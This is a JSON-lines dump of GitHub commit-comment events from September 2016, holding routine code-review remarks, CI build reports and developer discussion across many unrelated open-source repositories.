files[0]);\r\n}\r\n```\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\non button click ajax call to upload all the file at same time not individual ---\r\n\r\n```\r\n $(\"#myButtonUploadfile\").click(\r\n        function(e) {\r\n $.ajax({\r\n        url: \"uploadFiles\"\r\n        , data: ajaxData\r\n        , type: \"POST\"\r\n        , enctype: 'multipart/form-data'\r\n        , processData: false\r\n        , contentType: false\r\n        , success: function(result) {\r\n          \r\nconsole.log(\"sccess\");\r\n\r\n        }\r\n        , error: function(xhr, status, error) {\r\n            console.log(xhr + \"\" + status + \"\" + error);\r\n        }\r\n    });\r\n   });\r\n```"}},"created_at":"2016-09-01T02:56:09Z"}
{"id":"4500180361","type":"CommitCommentEvent","actor":{"login":"JikkuJose"},"repo":{"name":"jinnujohnson/Square"},"payload":{"comment":{"id":18857170,"position":44,"line":33,"path":"01-lets_get_started/01.cpp","commit_id":"c1f22f6e1ddd1718f0b93d6ba9161b60c9ca223e","created_at":"2016-09-01T02:56:58Z","updated_at":"2016-09-01T02:56:58Z","body":"Use `cerr` instead of `cout` for error messages. Try to be as brief & precise with error.\r\n\r\n`Error: Invalid input; expected an integer.`"}},"created_at":"2016-09-01T02:56:58Z"}
{"id":"4500181116","type":"CommitCommentEvent","actor":{"login":"Sn0wCrack"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18857171,"position":null,"line":null,"path":null,"commit_id":"3211ef12957ba4b4e18f3d60024c86b8f1fd83ed","created_at":"2016-09-01T02:57:17Z","updated_at":"2016-09-01T02:57:17Z","body":"Previously gallery_tag entries weren't being deleted correctly, however due to the way primary key constraints work, they were being left with gallery_id being NULL if the row was removed (due to the primary key not existing anymore), so in order to remedy this, I added this extra check. (I didn't realise the constraints existed when I made the commit).\r\nEverything should be fine, as an entry in gallery_tag with a NULL gallery_id wouldn't be linked to anything anyways."}},"created_at":"2016-09-01T02:57:17Z"}
{"id":"4500182185","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18857173,"position":null,"line":null,"path":null,"commit_id":"e2e46b028a2f08b7b49b15217e897d90ba7c0680","created_at":"2016-09-01T02:57:44Z","updated_at":"2016-09-01T02:57:44Z","body":"Related to: backdrop/backdrop-issues#2091 "}},"created_at":"2016-09-01T02:57:44Z"}
{"id":"4500182272","type":"CommitCommentEvent","actor":{"login":"JikkuJose"},"repo":{"name":"jinnujohnson/Square"},"payload":{"comment":{"id":18857174,"position":53,"line":41,"path":"01-lets_get_started/01.cpp","commit_id":"c1f22f6e1ddd1718f0b93d6ba9161b60c9ca223e","created_at":"2016-09-01T02:57:46Z","updated_at":"2016-09-01T02:57:46Z","body":"Don't use small meaningless variables like `s2` or `s3`."}},"created_at":"2016-09-01T02:57:46Z"}
{"id":"4500183035","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857177,"position":null,"line":null,"path":null,"commit_id":"34cf667ef26cea90003b336fbb2fbf9e2580bbee","created_at":"2016-09-01T02:58:04Z","updated_at":"2016-09-01T02:58:04Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2366 of 2367 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T02:58:04Z"}
{"id":"4500183806","type":"CommitCommentEvent","actor":{"login":"jimallman"},"repo":{"name":"OpenTreeOfLife/peyotl"},"payload":{"comment":{"id":18857180,"position":null,"line":null,"path":null,"commit_id":"7ccba74d5f324e7a9020f25a138b70884cc573b7","created_at":"2016-09-01T02:58:19Z","updated_at":"2016-09-01T02:58:19Z","body":"@mtholder, How could this pass our sugar tests, which don't match the studies in [the `mini_phyl` test repo](https://github.com/mtholder/mini_phyl)? I'm a bit lost in the sauce of peyotl's configuration options, so please clue me in."}},"created_at":"2016-09-01T02:58:19Z"}
{"id":"4500184012","type":"CommitCommentEvent","actor":{"login":"Sunako"},"repo":{"name":"Sn0wCrack/ExHentai-Archive"},"payload":{"comment":{"id":18857181,"position":null,"line":null,"path":null,"commit_id":"3211ef12957ba4b4e18f3d60024c86b8f1fd83ed","created_at":"2016-09-01T02:58:24Z","updated_at":"2016-09-01T02:58:24Z","body":"Alright. Also any chance of getting the userscript to check if a gallery has the delete column set as 2 and have it not show as archived? And line 73 on classes/Task/Cleanup.php `gallery_tumb` -> thumb"}},"created_at":"2016-09-01T02:58:24Z"}
{"id":"4500184707","type":"CommitCommentEvent","actor":{"login":"LeonardoChavesCavalcante"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":18857182,"position":null,"line":null,"path":null,"commit_id":"16558ce736e36c26a6337633e8864f871cf63e0e","created_at":"2016-09-01T02:58:40Z","updated_at":"2016-09-01T02:58:40Z","body":"I changed here, it worked!!\r\nThank you!!!"}},"created_at":"2016-09-01T02:58:40Z"}
{"id":"4500187743","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18857186,"position":null,"line":null,"path":null,"commit_id":"a3cbd4c2bf18429b79a7760a952f5428fe4f5c58","created_at":"2016-09-01T02:59:53Z","updated_at":"2016-09-01T02:59:53Z","body":"Related to: backdrop/backdrop-issues#2110 "}},"created_at":"2016-09-01T02:59:53Z"}
{"id":"4504776803","type":"CommitCommentEvent","actor":{"login":"mjibson"},"repo":{"name":"lib/pq"},"payload":{"comment":{"id":18869745,"position":17,"line":751,"path":"conn.go","commit_id":"57837c73d5c04cf0ebbfbd855251dc692559ce59","created_at":"2016-09-01T20:00:25Z","updated_at":"2016-09-01T20:00:25Z","body":"inCopy is written here, and it is read below. I think this will still trigger the race detector since the read/write unless access to that field is guarded by a sync mutex."}},"created_at":"2016-09-01T20:00:25Z"}
{"id":"4504783262","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18869760,"position":20,"line":4560,"path":"src/libostree/ostree-repo.c","commit_id":"9fc090f9da86b35356ac2673827aa1d9341d870d","created_at":"2016-09-01T20:01:37Z","updated_at":"2016-09-01T20:01:37Z","body":"OSTree style doesn't use `==/!= NULL`, but sure."}},"created_at":"2016-09-01T20:01:37Z"}
{"id":"4504786531","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869773,"position":29,"line":29,"path":"SeamCarve.Back/src/tests/UnitTests/FileStorageTests.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T20:02:17Z","updated_at":"2016-09-01T20:02:17Z","body":"I usually  clean up results in SetUp but do not in TearDown. IMHO this has two benefits:\r\n1. Allows your analyze how repository looks like after tests in case something went wrong (artifacts are still there)\r\n2. If program crached or stopped while debugging, on next run SetUp makes clean environment (in current variant, you will have problems in some cases)\r\n"}},"created_at":"2016-09-01T20:02:17Z"}
{"id":"4504792225","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18869781,"position":197,"line":74,"path":"src/web/js/error-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:03:22Z","updated_at":"2016-09-01T20:03:22Z","body":"Or rather, this line may have run, but the thunk created is either (a) not applied, or (b) has its error swallowed by the promise infrastructure."}},"created_at":"2016-09-01T20:03:22Z"}
{"id":"4504792301","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869782,"position":42,"line":42,"path":"SeamCarve.Back/src/tests/UnitTests/FileStorageTests.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T20:03:23Z","updated_at":"2016-09-01T20:03:23Z","body":"Consider having helper function in test case fixture called GetAssetDataBytes(assetName)"}},"created_at":"2016-09-01T20:03:23Z"}
{"id":"4504792884","type":"CommitCommentEvent","actor":{"login":"umarfaruq"},"repo":{"name":"stv0g/c11-queues"},"payload":{"comment":{"id":18869784,"position":null,"line":null,"path":null,"commit_id":"dc382566438c393abfcdec236c21e0b68ab324db","created_at":"2016-09-01T20:03:29Z","updated_at":"2016-09-01T20:03:29Z","body":"I spent some more time on the issues but couldn't resolve them. In a previous version of queue.h, using nanosleep() works after adding time.h header file without any additional compiler flags. I didn't spend additional time on it and have started working on porting the unbounded queue implementation of spsc http://www.1024cores.net/home/lock-free-algorithms/queues/unbounded-spsc-queue . It will need some modification to change it to bounded queue."}},"created_at":"2016-09-01T20:03:29Z"}
{"id":"4504793298","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18869785,"position":null,"line":null,"path":null,"commit_id":"fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d","created_at":"2016-09-01T20:03:34Z","updated_at":"2016-09-01T20:03:34Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa4f7e0a0a3f683a24563e83beb203c93ef1fd4d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-01T20:03:34Z"}
{"id":"4504793758","type":"CommitCommentEvent","actor":{"login":"geekosaur"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18869786,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T20:03:39Z","updated_at":"2016-09-01T20:03:39Z","body":"@liskin, and the reason this gets forced into the `manageHook` is:\r\n\r\n* you start up or flush the cache, it is now `Nothing`\r\n* `manageHook` gets notified of a strut window being mapped\r\n\r\nAt that has no choice but to repopulate the cache immediately; if it just adds the new strut, the cache is no longer `Nothing` and won't get rebuilt at whatever point you consider more aesthetically pleasing.\r\n\r\nI am ignoring everything from this point on as I cannot deal with it currently."}},"created_at":"2016-09-01T20:03:39Z"}
{"id":"4504793964","type":"CommitCommentEvent","actor":{"login":"Paul-E"},"repo":{"name":"ietf/perc-wg"},"payload":{"comment":{"id":18869788,"position":232,"line":327,"path":"draft-jones-perc-dtls-tunnel/draft-jones-perc-dtls-tunnel.md","commit_id":"6cabcd52999a9743afc5a5b2264eeaba239589a4","created_at":"2016-09-01T20:03:42Z","updated_at":"2016-09-01T20:03:42Z","body":">  We would not really need this to be any longer than the time the key distributor is likely to clear DTLS-SRTP state, which would be after receiving a message from the media distributor that the endpoint is gone or when it is told from above that the user left.\r\n\r\nI see your point here. I don't fully understand the issue in RFC 5764, but I think with the endpoint disconnect message this case should be covered pretty well. Are there ever times where the MD would reuse an association identifier if it hasn't seen the endpoint end the DTLS association or if the MD hasn't send an endpoint disconnect message itself? Without either of those the MD itself would think that association is still alive and would have no reason to use that identifier for another endpoint. Could we require that it never reuse one if either of those conditions are not met?\r\n\r\nMessage reordering shouldn't be an issue between the MD and KD thanks to TCP. If messages are reorder between the MD and the endpoint, and the MD has already sent the endpoint disconnect message, it should throw those delayed messages away, essentially forcing the endpoint to reconnect. This last part we may want to specify somewhere if we haven't already."}},"created_at":"2016-09-01T20:03:42Z"}
{"id":"4504794208","type":"CommitCommentEvent","actor":{"login":"obeattie"},"repo":{"name":"monzo/linkerd"},"payload":{"comment":{"id":18869789,"position":null,"line":null,"path":null,"commit_id":"39dd9c538c300bfce6060653b8d73838de891e85","created_at":"2016-09-01T20:03:45Z","updated_at":"2016-09-01T20:03:45Z","body":"Sure, I'll do that 🙂"}},"created_at":"2016-09-01T20:03:45Z"}
{"id":"4504798786","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18869797,"position":122,"line":535,"path":"src/libostree/ostree-repo-commit.c","commit_id":"04b844b3c0d10e8b988fa20c2c2b3fb48909aebe","created_at":"2016-09-01T20:04:32Z","updated_at":"2016-09-01T20:04:32Z","body":"Sure."}},"created_at":"2016-09-01T20:04:32Z"}
{"id":"4504800070","type":"CommitCommentEvent","actor":{"login":"ericek111"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18869798,"position":null,"line":null,"path":null,"commit_id":"8ecbab4dcfaff6cc302f085af06e631bc7aac97b","created_at":"2016-09-01T20:04:48Z","updated_at":"2016-09-01T20:04:48Z","body":"So is this forceAttack or forceJump? :D \r\n`csgo.m_oAddressOfForceJump = csgo.GetCallAddress((void*)(foundForceAttackMov+26));`"}},"created_at":"2016-09-01T20:04:48Z"}
{"id":"4504800242","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18869800,"position":103,"line":55,"path":"src/web/js/error-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:04:50Z","updated_at":"2016-09-01T20:04:50Z","body":"Re: the comment below about `applyMethod`, I think that if the thunk from `applyMethod` runs, then the failure @blerner mentioned about \"no fields on `undefined`\" will show up here."}},"created_at":"2016-09-01T20:04:50Z"}
{"id":"4504800355","type":"CommitCommentEvent","actor":{"login":"Paul-E"},"repo":{"name":"ietf/perc-wg"},"payload":{"comment":{"id":18869801,"position":192,"line":295,"path":"draft-jones-perc-dtls-tunnel/draft-jones-perc-dtls-tunnel.md","commit_id":"6cabcd52999a9743afc5a5b2264eeaba239589a4","created_at":"2016-09-01T20:04:51Z","updated_at":"2016-09-01T20:04:51Z","body":"That seems fine to me."}},"created_at":"2016-09-01T20:04:51Z"}
{"id":"4504801727","type":"CommitCommentEvent","actor":{"login":"jdeolive"},"repo":{"name":"voyagersearch/SolrTextTagger"},"payload":{"comment":{"id":18869805,"position":null,"line":null,"path":null,"commit_id":"734756a19777ee1e1d098ffab527c375778fd381","created_at":"2016-09-01T20:05:09Z","updated_at":"2016-09-01T20:05:09Z","body":"I meant to submit this back upstream when I originally wrote but totally fell off my radar :) I am almost certain the change is self contained. I'll put this back on my short term todo list. "}},"created_at":"2016-09-01T20:05:09Z"}
{"id":"4504804838","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18869806,"position":103,"line":55,"path":"src/web/js/error-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:05:42Z","updated_at":"2016-09-01T20:05:42Z","body":"@blerner: a justification I can think of is if all the clients of `callDeferred` dispatch on exception-vs-Pyret value in their `.then` blocks.  Is that what's going on, @jack?"}},"created_at":"2016-09-01T20:05:42Z"}
{"id":"4504809013","type":"CommitCommentEvent","actor":{"login":"scoder"},"repo":{"name":"haypo/perf"},"payload":{"comment":{"id":18869812,"position":44,"line":97,"path":"perf/text_runner.py","commit_id":"b2b0067fe45f3c5037d8fcd95d23c9d2afa38b31","created_at":"2016-09-01T20:06:29Z","updated_at":"2016-09-01T20:06:29Z","body":"That seems to depend on `sys.implementation()` or `platform`. None of those changes in Cython. Cython is just CPython but with statically compiled Python code. My guess is that there's going to be more to change here, so I'd best come up with a pull request myself. Eventually."}},"created_at":"2016-09-01T20:06:29Z"}
{"id":"4504812155","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869818,"position":95,"line":95,"path":"SeamCarve.Back/src/tests/UnitTests/FileStorageTests.cs","commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T20:07:06Z","updated_at":"2016-09-01T20:07:06Z","body":"Probaby better approach is asking repository to load and make sure it raises appropriate exception. Or, ask file repository to give you (tests) a location where it would normally save a file. Because now, you tests are very tight with repository implementation and change in target path calculating strategy by repository would end up in rewriting tests. **It is not critical. and you can keep it as is, but you should think about consequences, this is very important.**"}},"created_at":"2016-09-01T20:07:06Z"}
{"id":"4504816058","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18869826,"position":13,"line":13,"path":"sql/updates/world/3.3.5/2016_09_01_01_world.sql","commit_id":"f5cbc17387dcd8ac5d05436d3382053e8a0ab55f","created_at":"2016-09-01T20:07:52Z","updated_at":"2016-09-01T20:07:52Z","body":"That spell ID is based on recent or current retail game / Blizzard server content (not for 3.3.5a build 12340).\r\nIf you look at the web archive pages for that mob, you will find these ability links were used in 2010:\r\n\r\nBleeding Hollow Darkcaster: http://web.archive.org/web/20100424192715/http://www.wowhead.com/npc=17269\r\n- Rain of Fire: http://web.archive.org/web/20100424192715/http://www.wowhead.com/spell=20754\r\n- Rain of Fire: http://web.archive.org/web/20100424192715/http://www.wowhead.com/spell=36808\r\n- Scorch: http://web.archive.org/web/20100424192715/http://www.wowhead.com/spell=15241\r\n- Scorch: http://web.archive.org/web/20100424192715/http://www.wowhead.com/spell=36807\r\n\r\n(Notice that the archive page only lists a bunch of links, so these 4 are at the end of the \"list\".)"}},"created_at":"2016-09-01T20:07:52Z"}
{"id":"4504817360","type":"CommitCommentEvent","actor":{"login":"lsem"},"repo":{"name":"sarat12/seamcarving"},"payload":{"comment":{"id":18869829,"position":null,"line":null,"path":null,"commit_id":"a097b7c52a34dc083f0a4668dceb92ac6ca37f68","created_at":"2016-09-01T20:08:07Z","updated_at":"2016-09-01T20:08:07Z","body":"+ 1. I like this, but have some comments."}},"created_at":"2016-09-01T20:08:07Z"}
{"id":"4504817430","type":"CommitCommentEvent","actor":{"login":"kostyfisik"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":18869830,"position":null,"line":null,"path":null,"commit_id":"6d70ce1ba60793e392b76da6e5c04bd4a712531e","created_at":"2016-09-01T20:08:08Z","updated_at":"2016-09-01T20:08:08Z","body":"@yakovru This category is off by default. Any good reason for this?"}},"created_at":"2016-09-01T20:08:08Z"}
{"id":"4504823396","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18869849,"position":225,"line":81,"path":"src/web/js/error-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:09:15Z","updated_at":"2016-09-01T20:09:15Z","body":"If you're going to have a function that takes arguments beyond those listed, _please_ put a comment in the header somewhere so it's clear that it's a more than the listed arity function, and what they might mean.\r\n\r\nI'm super-confused by this, because I thought `applyMethod` worked on Pyret methods, which can't be variable arity, but this `slice` seems to imply that the method will be called with variable arity.  Am I missing something?"}},"created_at":"2016-09-01T20:09:15Z"}
{"id":"4504823960","type":"CommitCommentEvent","actor":{"login":"RByers"},"repo":{"name":"ftlabs/fastclick"},"payload":{"comment":{"id":18869851,"position":null,"line":null,"path":null,"commit_id":"4e409926198147f24a49c293923d2a2a047c3774","created_at":"2016-09-01T20:09:21Z","updated_at":"2016-09-01T20:09:21Z","body":"This is good advice (also addressed by #498).  Was this intentionally never merged to master?"}},"created_at":"2016-09-01T20:09:21Z"}
{"id":"4504824608","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18869852,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-01T20:09:29Z","updated_at":"2016-09-01T20:09:29Z","body":"@snicolet Great, seems fine then :-)"}},"created_at":"2016-09-01T20:09:29Z"}
{"id":"4504824971","type":"CommitCommentEvent","actor":{"login":"jessesquires"},"repo":{"name":"CocoaPods/Specs"},"payload":{"comment":{"id":18869853,"position":null,"line":null,"path":null,"commit_id":"cd74fea7c0c4ed34c50839ede218ecbf460010b0","created_at":"2016-09-01T20:09:33Z","updated_at":"2016-09-01T20:09:33Z","body":"Hey @GianniCarlo !\r\n\r\nIt looks like you've mistakenly published this under my name, with my credentials. \r\nhttps://twitter.com/CocoaPodsFeed/status/771426903194497025\r\n\r\nSince I am not the author, would you mind helping resolve this? We can delete the podspec and republish it with your credentials instead. 😄 "}},"created_at":"2016-09-01T20:09:33Z"}
{"id":"4504826822","type":"CommitCommentEvent","actor":{"login":"owerosu"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18869856,"position":null,"line":null,"path":null,"commit_id":"8ecbab4dcfaff6cc302f085af06e631bc7aac97b","created_at":"2016-09-01T20:09:53Z","updated_at":"2016-09-01T20:09:53Z","body":"I'm a fucktard"}},"created_at":"2016-09-01T20:09:53Z"}
{"id":"4504829625","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"QuietMisdreavus/twitter-rs"},"payload":{"comment":{"id":18869859,"position":41,"line":337,"path":"src/tweet/structs.rs","commit_id":"4c977eddfe12a3cf78856befc14448df664d6c59","created_at":"2016-09-01T20:10:23Z","updated_at":"2016-09-01T20:10:23Z","body":"Hell yes"}},"created_at":"2016-09-01T20:10:23Z"}
{"id":"4504830401","type":"CommitCommentEvent","actor":{"login":"jessesquires"},"repo":{"name":"CocoaPods/Specs"},"payload":{"comment":{"id":18869860,"position":null,"line":null,"path":null,"commit_id":"cd74fea7c0c4ed34c50839ede218ecbf460010b0","created_at":"2016-09-01T20:10:33Z","updated_at":"2016-09-01T20:10:33Z","body":"More specifically, `homepage`, `authors`, and `social_media_url` should be updated."}},"created_at":"2016-09-01T20:10:33Z"}
{"id":"4504834578","type":"CommitCommentEvent","actor":{"login":"llama-0"},"repo":{"name":"llama-0/MedConnect"},"payload":{"comment":{"id":18869875,"position":34,"line":52,"path":"MedConnectBot/MedConnectBot/Tele/BotContext.cs","commit_id":"611df7179dc8223b12fbbc8deb17503b031bcc52","created_at":"2016-09-01T20:11:28Z","updated_at":"2016-09-01T20:11:28Z","body":"Error: use of unassigned local variable 'msg'\r\n\r\nЕсли не вводить её, а просто использовать Message, Error: an object reference is required to access non-static member Telegram.Bot.Types.Message.Text \r\nнашла как исправить только для случая, если у меня наследуюемый класс. Сюда не подходит, потому что я использую библиотеку Телеграмовского бот апи., а не наследуемый класс. \r\nИ пока не стала переносить проверку в основной процесс.  "}},"created_at":"2016-09-01T20:11:28Z"}
{"id":"4504836666","type":"CommitCommentEvent","actor":{"login":"owerosu"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18869876,"position":null,"line":null,"path":null,"commit_id":"eaa1b8d9c4380cfa668dbdaaf53a224c773a8917","created_at":"2016-09-01T20:11:46Z","updated_at":"2016-09-01T20:11:46Z","body":"https://github.com/McSwaggens/linux-csgo-external doesn't have logs anymore so ..."}},"created_at":"2016-09-01T20:11:46Z"}
{"id":"4504842133","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18869905,"position":96,"line":48,"path":"src/web/js/error-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:12:51Z","updated_at":"2016-09-01T20:12:51Z","body":"This comment is inconsistent with the code below.  `runThunk` raises an exception if called on an active Pyret stack, right?  `runThunk` is an entrypoint that starts a _new_ Pyret stack."}},"created_at":"2016-09-01T20:12:51Z"}
{"id":"4504843310","type":"CommitCommentEvent","actor":{"login":"CovertJaguar"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18869914,"position":57,"line":51,"path":"src/main/java/mods/railcraft/common/carts/RailcraftCarts.java","commit_id":"88c25a862c9a96fc6483cc7ed771ed031032df01","created_at":"2016-09-01T20:13:05Z","updated_at":"2016-09-01T20:13:05Z","body":"This is likely referring to EntityMinecartHopper.class, but I don't remember what the error messages were or when I added the TODO."}},"created_at":"2016-09-01T20:13:05Z"}
{"id":"4504846381","type":"CommitCommentEvent","actor":{"login":"zanderz"},"repo":{"name":"keybase/client"},"payload":{"comment":{"id":18869926,"position":19,"line":210,"path":"packaging/windows/WIXInstallers/KeybaseBundle/Bundle.wxs","commit_id":"a9c8bddc389f761dc68a234983540311d7e77758","created_at":"2016-09-01T20:13:41Z","updated_at":"2016-09-01T20:13:41Z","body":"Thanks for the heads up. Glad to offer the PR, I will look into it. What would be great for us is if the dokan .msi packages were included in the binary release materials too - who does installers/releases on Dokany?"}},"created_at":"2016-09-01T20:13:41Z"}
{"id":"4504846534","type":"CommitCommentEvent","actor":{"login":"pdettori"},"repo":{"name":"containercafe/containercafe"},"payload":{"comment":{"id":18869928,"position":5,"line":50,"path":"ansible/roles/k8sm-master/templates/scheduler.yaml.tmpl","commit_id":"1512be787e73de77b42595f49b7f09cb9632f430","created_at":"2016-09-01T20:13:44Z","updated_at":"2016-09-01T20:13:44Z","body":"@MikeSpreitzer does kubelet takes the network args from scheduler for both the mesos and non-mesos cases ? Does the kubelet on worker node need the network args for the non-mesos case ?"}},"created_at":"2016-09-01T20:13:44Z"}
{"id":"4504848354","type":"CommitCommentEvent","actor":{"login":"jcouv"},"repo":{"name":"dotnet/roslyn"},"payload":{"comment":{"id":18869932,"position":4,"line":1701,"path":"src/Compilers/VisualBasic/Portable/Errors/Errors.vb","commit_id":"16297fb7db89a92eeca93ca5ded19cd0623b4d12","created_at":"2016-09-01T20:14:06Z","updated_at":"2016-09-01T20:14:06Z","body":"FYI, I just noticed that this uses a duplicate ERRID. I'll fix."}},"created_at":"2016-09-01T20:14:06Z"}
{"id":"4504851647","type":"CommitCommentEvent","actor":{"login":"markdstafford"},"repo":{"name":"darrelmiller/posts"},"payload":{"comment":{"id":18869939,"position":1,"line":1,"path":"whats-new-in-openapi/What-is-new.md","commit_id":"e633fdb80777d3da1aec6e958d6250249ae866a5","created_at":"2016-09-01T20:14:45Z","updated_at":"2016-09-01T20:14:45Z","body":"Read time: 12 minutes.\r\n\r\nOverall I think this doc with this length and detail has value. Don't get rid of it.\r\n\r\nThat said, this doc happens to be pretty technical. I can follow most of it as I've worked with Swagger somewhat extensively, but I suspect that most readers would not understand a large percentage of this post. It might be good to have a \"What's New\" for dilettantes. That could focus on being a 3-5 minute read and reducing entire paragraphs to single statements, e.g., the whole \"structural improvements\" section could be a few sentences. If people want more detail, you could link through from the summary view to the full doc you've written here."}},"created_at":"2016-09-01T20:14:45Z"}
{"id":"4504851681","type":"CommitCommentEvent","actor":{"login":"michel-cf"},"repo":{"name":"parallaxinc/Scribbler-3_Library"},"payload":{"comment":{"id":18869940,"position":4,"line":66,"path":"Block_Wrapper.spin","commit_id":"87058ecd70c8ce698265788372aef73f99333c51","created_at":"2016-09-01T20:14:45Z","updated_at":"2016-09-01T20:14:45Z","body":"Is it not better to do?\r\n\r\n`waitcnt(clkfreq + cnt)`"}},"created_at":"2016-09-01T20:14:45Z"}
{"id":"4504853845","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18869945,"position":395,"line":121,"path":"src/web/js/error-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:15:12Z","updated_at":"2016-09-01T20:15:12Z","body":"In my reading of this, `reason_to_html` can't care about whether it's on a Pyret stack or not, because it just returns a function – does this comment apply to the returned thunk?"}},"created_at":"2016-09-01T20:15:12Z"}
{"id":"4504854268","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18869948,"position":22,"line":127,"path":"include/vrv/att.h","commit_id":"5bb9115cd2dc76f46f46f5b58835c9043ea3f930","created_at":"2016-09-01T20:15:17Z","updated_at":"2016-09-01T20:15:17Z","body":"For now just convert from / to int. Eventually we could add a value range check"}},"created_at":"2016-09-01T20:15:17Z"}
{"id":"4504855721","type":"CommitCommentEvent","actor":{"login":"jpolitz"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18869954,"position":4,"line":127,"path":"src/web/js/repl-ui.js","commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-01T20:15:32Z","updated_at":"2016-09-01T20:15:32Z","body":"This must be called on a Pyret stack since `pauseStack` is called within."}},"created_at":"2016-09-01T20:15:32Z"}
{"id":"4504856162","type":"CommitCommentEvent","actor":{"login":"LinguList"},"repo":{"name":"glottobank/lexibank-data"},"payload":{"comment":{"id":18869955,"position":3,"line":1,"path":"datasets/tukanoaligned/README.json","commit_id":"19181a1855365425ddf9b66e8c573ff009a94c47","created_at":"2016-09-01T20:15:37Z","updated_at":"2016-09-01T20:15:37Z","body":"I added the concepts to the concepticon now as Chacon-2014-142. I also added missing concepts to the concepticon. As a result, the concepticon will hopefully provide the better mapping (once updated)."}},"created_at":"2016-09-01T20:15:37Z"}
